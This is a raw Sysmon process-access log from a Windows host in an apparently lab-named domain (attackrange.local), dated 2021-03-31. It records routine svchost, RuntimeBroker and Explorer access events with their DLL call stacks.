12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.337{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 